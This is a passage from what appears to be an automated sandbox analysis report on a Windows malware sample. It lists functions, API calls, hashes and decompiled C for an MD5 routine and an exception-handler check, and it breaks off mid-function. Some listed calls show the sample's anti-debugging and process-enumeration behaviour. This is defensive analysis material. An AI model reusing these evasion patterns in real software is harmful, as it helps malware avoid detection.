                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 00A34A26
                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00A34A52
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A34A61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                  • Opcode ID: 986503825d83895b7a79839604321646fe1400658c17f27eb788142872e16ff6
                                                                                                                                  • Instruction ID: f72cb21de75beaf67882c3e0de91c92859049105fdcf83bd255ac26fab31e529
                                                                                                                                  • Opcode Fuzzy Hash: 986503825d83895b7a79839604321646fe1400658c17f27eb788142872e16ff6
                                                                                                                                  • Instruction Fuzzy Hash: 95F05072900124ABD720E766DD09EEB33ACDFC9350F0000A2F555D3000EB24EE56C7B5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E916CB3, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 6E916DAB
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E916DB5
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 6E916DC2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                  • Opcode ID: 47761f88c45a731c83d21ab22f6b35a991cdcae3aa383676be073499e7e65542
                                                                                                                                  • Instruction ID: d16559b2027dae4ae9ed6ea81ee8ef1e83c14cc1fc4bcd0f1f020178f182e7e5
                                                                                                                                  • Opcode Fuzzy Hash: 47761f88c45a731c83d21ab22f6b35a991cdcae3aa383676be073499e7e65542
                                                                                                                                  • Instruction Fuzzy Hash: 2D31C474D1122C9BCB61DF68D9887CDBBB8BF58314F5045DAE41CA7290E7709B858F44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E92C325, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,6E92C324,?,000000FF,?,?,?,00000004), ref: 6E92C347
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,6E92C324,?,000000FF,?,?,?,00000004), ref: 6E92C34E
                                                                                                                                  • ExitProcess.KERNEL32 ref: 6E92C360
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                  • Opcode ID: 6424151bc1451747b8d23252184646a02ea736aeae8bc1b8d120af2664b9da79
                                                                                                                                  • Instruction ID: c7536a1dea7386dd66a2a7283ce7fc02fb313ee98de159c8e90482be50e8a825
                                                                                                                                  • Opcode Fuzzy Hash: 6424151bc1451747b8d23252184646a02ea736aeae8bc1b8d120af2664b9da79
                                                                                                                                  • Instruction Fuzzy Hash: 29E0B671024648EFDF15BBA4C958A8D3B7DFF49295F104824F9159A129EB35E981CF80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E91D630, Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 18ea39758708a15d293a347ed6dcb048d7f231aa9cb202a8f0fd0045fed3f659
                                                                                                                                  • Instruction ID: 9cbde1340dd8c4f115542b9bb932c3229b912cf8551d9d68d52d0a04beb32d02
                                                                                                                                  • Opcode Fuzzy Hash: 18ea39758708a15d293a347ed6dcb048d7f231aa9cb202a8f0fd0045fed3f659
                                                                                                                                  • Instruction Fuzzy Hash: B4F13C71E0521A9FDF14CFA9C8906DEBBB5FF88315F158269E819AB344D731AA01CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A32B76, Relevance: 1.9, APIs: 1, Instructions: 611COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 49%
                                                                                                                                  			E00A32B76(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}


































































































                                                                                                                                  0x00a32b79
                                                                                                                                  0x00a32b84
                                                                                                                                  0x00a32b87
                                                                                                                                  0x00a32b8a
                                                                                                                                  0x00a32b8b
                                                                                                                                  0x00a32ba9
                                                                                                                                  0x00a32bab
                                                                                                                                  0x00a32bae
                                                                                                                                  0x00a32bb1
                                                                                                                                  0x00a32bb1
                                                                                                                                  0x00a32bb4
                                                                                                                                  0x00a32bb4
                                                                                                                                  0x00a32bb7
                                                                                                                                  0x00a32bb7
                                                                                                                                  0x00a32bba
                                                                                                                                  0x00a32bba
                                                                                                                                  0x00a32bd7
                                                                                                                                  0x00a32bda
                                                                                                                                  0x00a32bf0
                                                                                                                                  0x00a32bf3
                                                                                                                                  0x00a32c0d
                                                                                                                                  0x00a32c10
                                                                                                                                  0x00a32c26
                                                                                                                                  0x00a32c29
                                                                                                                                  0x00a32c2b
                                                                                                                                  0x00a32c43
                                                                                                                                  0x00a32c46
                                                                                                                                  0x00a32c49
                                                                                                                                  0x00a32c61
                                                                                                                                  0x00a32c64
                                                                                                                                  0x00a32c7e
                                                                                                                                  0x00a32c81
                                                                                                                                  0x00a32c97
                                                                                                                                  0x00a32c9a
                                                                                                                                  0x00a32c9c
                                                                                                                                  0x00a32cb4
                                                                                                                                  0x00a32cb9
                                                                                                                                  0x00a32cbc
                                                                                                                                  0x00a32cd2
                                                                                                                                  0x00a32cd5
                                                                                                                                  0x00a32cef
                                                                                                                                  0x00a32cf2
                                                                                                                                  0x00a32d08
                                                                                                                                  0x00a32d0b
                                                                                                                                  0x00a32d0d
                                                                                                                                  0x00a32d28
                                                                                                                                  0x00a32d2b
                                                                                                                                  0x00a32d42
                                                                                                                                  0x00a32d45
                                                                                                                                  0x00a32d49
                                                                                                                                  0x00a32d62
                                                                                                                                  0x00a32d65
                                                                                                                                  0x00a32d67
                                                                                                                                  0x00a32d6a
                                                                                                                                  0x00a32d85
                                                                                                                                  0x00a32d88
                                                                                                                                  0x00a32da1
                                                                                                                                  0x00a32da4
                                                                                                                                  0x00a32db4
                                                                                                                                  0x00a32db7
                                                                                                                                  0x00a32dcf
                                                                                                                                  0x00a32dd2
                                                                                                                                  0x00a32dec
                                                                                                                                  0x00a32def
                                                                                                                                  0x00a32e07
                                                                                                                                  0x00a32e0a
                                                                                                                                  0x00a32e20
                                                                                                                                  0x00a32e23
                                                                                                                                  0x00a32e3b
                                                                                                                                  0x00a32e3e
                                                                                                                                  0x00a32e56
                                                                                                                                  0x00a32e59
                                                                                                                                  0x00a32e73
                                                                                                                                  0x00a32e76
                                                                                                                                  0x00a32e8c
                                                                                                                                  0x00a32e8f
                                                                                                                                  0x00a32ea7
                                                                                                                                  0x00a32eaa
                                                                                                                                  0x00a32ec4
                                                                                                                                  0x00a32ec7
                                                                                                                                  0x00a32edf
                                                                                                                                  0x00a32ee2
                                                                                                                                  0x00a32ef8
                                                                                                                                  0x00a32efb
                                                                                                                                  0x00a32f13
                                                                                                                                  0x00a32f16
                                                                                                                                  0x00a32f2e
                                                                                                                                  0x00a32f31
                                                                                                                                  0x00a32f43
                                                                                                                                  0x00a32f46
                                                                                                                                  0x00a32f58
                                                                                                                                  0x00a32f5b
                                                                                                                                  0x00a32f6d
                                                                                                                                  0x00a32f70
                                                                                                                                  0x00a32f74
                                                                                                                                  0x00a32f84
                                                                                                                                  0x00a32f87
                                                                                                                                  0x00a32f95
                                                                                                                                  0x00a32f98
                                                                                                                                  0x00a32faa
                                                                                                                                  0x00a32fad
                                                                                                                                  0x00a32fc1
                                                                                                                                  0x00a32fc4
                                                                                                                                  0x00a32fc6
                                                                                                                                  0x00a32fd6
                                                                                                                                  0x00a32fd9
                                                                                                                                  0x00a32feb
                                                                                                                                  0x00a32fee
                                                                                                                                  0x00a32ffc
                                                                                                                                  0x00a32fff
                                                                                                                                  0x00a33011
                                                                                                                                  0x00a33014
                                                                                                                                  0x00a33018
                                                                                                                                  0x00a33028
                                                                                                                                  0x00a3302b
                                                                                                                                  0x00a3303d
                                                                                                                                  0x00a33040
                                                                                                                                  0x00a3304e
                                                                                                                                  0x00a33051
                                                                                                                                  0x00a33063
                                                                                                                                  0x00a33066
                                                                                                                                  0x00a33078
                                                                                                                                  0x00a3307b
                                                                                                                                  0x00a3308f
                                                                                                                                  0x00a33092
                                                                                                                                  0x00a330a6
                                                                                                                                  0x00a330a9
                                                                                                                                  0x00a330bd
                                                                                                                                  0x00a330c0
                                                                                                                                  0x00a330d4
                                                                                                                                  0x00a330d7
                                                                                                                                  0x00a330eb
                                                                                                                                  0x00a330ee
                                                                                                                                  0x00a33102
                                                                                                                                  0x00a33107
                                                                                                                                  0x00a33119
                                                                                                                                  0x00a3311c
                                                                                                                                  0x00a33130
                                                                                                                                  0x00a33133
                                                                                                                                  0x00a33147
                                                                                                                                  0x00a3314a
                                                                                                                                  0x00a33160
                                                                                                                                  0x00a33163
                                                                                                                                  0x00a33177
                                                                                                                                  0x00a3317a
                                                                                                                                  0x00a3318c
                                                                                                                                  0x00a3318f
                                                                                                                                  0x00a331a3
                                                                                                                                  0x00a331a6
                                                                                                                                  0x00a331ba
                                                                                                                                  0x00a331bd
                                                                                                                                  0x00a331d1
                                                                                                                                  0x00a331da
                                                                                                                                  0x00a331dd
                                                                                                                                  0x00a331e6
                                                                                                                                  0x00a331ef
                                                                                                                                  0x00a331f7
                                                                                                                                  0x00a331ff
                                                                                                                                  0x00a33209
                                                                                                                                  0x00a3321e

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                  • Opcode ID: c932cbf2a409a87c6291a25323f1d36c96c09ec801fe66f8d437da4467a69dd6
                                                                                                                                  • Instruction ID: 1ac2638bb8d35e50099cd2130f406509964cb5b5650409a0c56cc51896fa9c46
                                                                                                                                  • Opcode Fuzzy Hash: c932cbf2a409a87c6291a25323f1d36c96c09ec801fe66f8d437da4467a69dd6
                                                                                                                                  • Instruction Fuzzy Hash: 7A22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E933CCE, Relevance: 1.8, APIs: 1, Instructions: 274COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E933CC9,?,?,00000008,?,?,6E943264,00000000), ref: 6E933EFB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                  • Opcode ID: ace0544ab90d284e76825220e2466fcdcfa3e5424df9a01a755b9ab277576cb7
                                                                                                                                  • Instruction ID: c1ff1db682849dc0d3c59b73d3e464833a83d3b68d53fba03f5e5417b85e587f
                                                                                                                                  • Opcode Fuzzy Hash: ace0544ab90d284e76825220e2466fcdcfa3e5424df9a01a755b9ab277576cb7
                                                                                                                                  • Instruction Fuzzy Hash: F4B17635260619CFEB14CF68C49AB947BB0FF45365F658658E8A9CF2A1C335E982CF40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3B149, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3B149(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xa3d318; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xa3d360 = 1;
										__eflags =  *0xa3d360;
										if( *0xa3d360 != 0) {
											goto L60;
										}
										_t84 =  *0xa3d318; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xa3d360 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xa3d318 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xa3d320 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xa3d31c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
